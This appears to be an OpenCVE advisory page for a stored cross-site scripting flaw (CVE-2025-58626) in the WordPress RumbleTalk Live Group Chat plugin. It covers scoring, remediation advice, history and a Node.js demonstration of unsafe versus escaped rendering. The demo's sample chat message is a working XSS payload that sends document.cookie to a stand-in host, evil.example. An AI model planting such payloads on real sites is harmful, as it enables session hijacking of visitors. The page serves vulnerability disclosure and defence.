Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat rumbletalk-chat-a-chat-with-themes allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through <= 6.3.5.
Published: 2025-09-03
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a stored cross-site scripting flaw: attacker-supplied input is saved as part of a chat message and later rendered, unescaped, to other visitors of the site that embeds the chat. Because the stored text is inserted into the page without proper HTML encoding, an attacker can embed arbitrary JavaScript that executes in the browser of every user who views the chat. A successful attack can be used to hijack sessions, present phishing content, or deface the page for viewing users. The weakness is CWE-79, Improper Neutralization of Input During Web Page Generation; the root cause is missing output encoding at render time, not merely weak input validation.

Affected Systems

The flaw exists in the WordPress RumbleTalk Live Group Chat plugin (slug rumbletalk-chat-a-chat-with-themes), versions up to and including 6.3.5. Any site running one of those releases is exposed. The affected range is bounded at 6.3.5, but this page records no vendor fix, so a newer release should be confirmed against the vendor's changelog rather than presumed fixed.

Risk and Exploitability

The CVSS 3.1 base score of 6.5 (vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) indicates a medium-severity vulnerability: reachable over the network, low attack complexity, low privileges required, user interaction required (a victim must view the poisoned chat), and changed scope, the conventional scoring for XSS because the injected script runs in the victim's browser rather than in the vulnerable server component. The EPSS score below 1% indicates a very low current probability of exploitation, and the vulnerability is not listed in CISA's KEV catalog, which is consistent with that estimate. The likely attack vector is a chat message submitted through the plugin's posting interface; PR:L means the attacker needs an account able to post in the chat, not merely anonymous access. Once stored, the payload executes for every user who views the chat content, with the confidentiality, integrity and availability impacts all rated low.

Generated by OpenCVE AI on April 30, 2026 at 02:48 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the RumbleTalk Live Group Chat plugin to a release later than 6.3.5 once the vendor confirms it removes the XSS flaw
  • If an upgrade is not immediately possible, ensure chat message content is HTML-encoded at render time (in WordPress, the esc_html() / wp_kses() family) and, where the plugin allows it, strip markup before storage; sanitizing on storage alone leaves already-stored payloads live until the rendering path is fixed
  • Restrict chat posting to trusted, authenticated roles, disable any feature that accepts freeform HTML in chat messages, and consider a Content-Security-Policy that disallows inline scripts to limit what an injected payload can do

Generated by OpenCVE AI on April 30, 2026 at 02:48 UTC.
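As an added illustration of the mechanism described in the Impact section and of the render-time encoding the recommended actions call for, the following Node.js snippet is not RumbleTalk code and does not reflect the plugin's actual rendering path; the message store, the payload and the evil.example host are constructed for the demonstration. It renders the same stored messages twice, once by concatenating raw text into HTML (the CWE-79 pattern) and once through an HTML-encoding step, and checks which output still carries injected markup.

```javascript
// Added example (not RumbleTalk code): how a stored XSS in a chat renderer arises
// and how output encoding at render time closes it. Runs under Node.js, no DOM needed.

// Constructed sample of what a chat backend might persist: one benign message and
// one whose body carries an injected script. Payload and host are illustrative only.
const STORED_MESSAGES = [
  { user: 'alice', body: 'hello <3' },
  { user: 'mallory', body: '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">' },
];

// Vulnerable pattern: stored text is concatenated straight into HTML, so any
// markup in the body is parsed as markup by every visitor's browser.
function renderUnsafe(messages) {
  return messages
    .map((m) => `<div class="msg"><b>${m.user}</b>: ${m.body}</div>`)
    .join('\n');
}

// Hardened pattern: encode the five characters that are significant in HTML
// text and attribute contexts before the value reaches the page. This is the
// CWE-79 fix: neutralize at output time, regardless of what was stored.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSafe(messages) {
  return messages
    .map((m) => `<div class="msg"><b>${escapeHtml(m.user)}</b>: ${escapeHtml(m.body)}</div>`)
    .join('\n');
}

// Crude detector used only to make the difference visible: does the rendered
// HTML open any tag other than the <div> and <b> the template itself emits?
// "<3" in alice's message is not flagged because a digit cannot start a tag.
const FOREIGN_TAG = /<(?!\/?(?:div|b)[\s>])[a-z]/i;

function containsInjectedMarkup(html) {
  return FOREIGN_TAG.test(html);
}

console.log('--- unsafe render ---\n' + renderUnsafe(STORED_MESSAGES));
console.log('--- safe render ---\n' + renderSafe(STORED_MESSAGES));
console.log('injected markup in unsafe render:', containsInjectedMarkup(renderUnsafe(STORED_MESSAGES)));
console.log('injected markup in safe render:  ', containsInjectedMarkup(renderSafe(STORED_MESSAGES)));
```

Escaping everything is the right default for a chat widget that only needs plain text. If limited formatting (links, bold) is a product requirement, the alternative is an allowlist sanitizer such as WordPress's wp_kses() with a tight tag and attribute list, applied at render time as well; the unsafe renderer above shows why filtering on storage alone is not enough once hostile rows already exist.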

Advisories

Source: EUVD
ID: EUVD-2025-26541
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5.

History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description (removed): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5.
Description (added): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat rumbletalk-chat-a-chat-with-themes allows Stored XSS.This issue affects RumbleTalk Live Group Chat: from n/a through <= 6.3.5.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Wed, 03 Sep 2025 20:30:00 +0000

Type Values Removed Values Added
First Time appeared: Rumbletalk; Rumbletalk live Group Chat Plugin; Wordpress; Wordpress wordpress
Vendors & Products: Rumbletalk; Rumbletalk live Group Chat Plugin; Wordpress; Wordpress wordpress

Wed, 03 Sep 2025 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 03 Sep 2025 14:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RumbleTalk RumbleTalk Live Group Chat allows Stored XSS. This issue affects RumbleTalk Live Group Chat: from n/a through 6.3.5.
Title WordPress RumbleTalk Live Group Chat Plugin <= 6.3.5 - Cross Site Scripting (XSS) Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-05-13T00:09:44.269Z

Reserved: 2025-09-03T09:03:04.975Z

Link: CVE-2025-58626

Vulnrichment

Updated: 2025-09-03T18:06:38.052Z

NVD

Status: Deferred

Published: 2025-09-03T15:15:45.817

Modified: 2026-04-23T15:33:29.223

Link: CVE-2025-58626

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T03:00:15Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')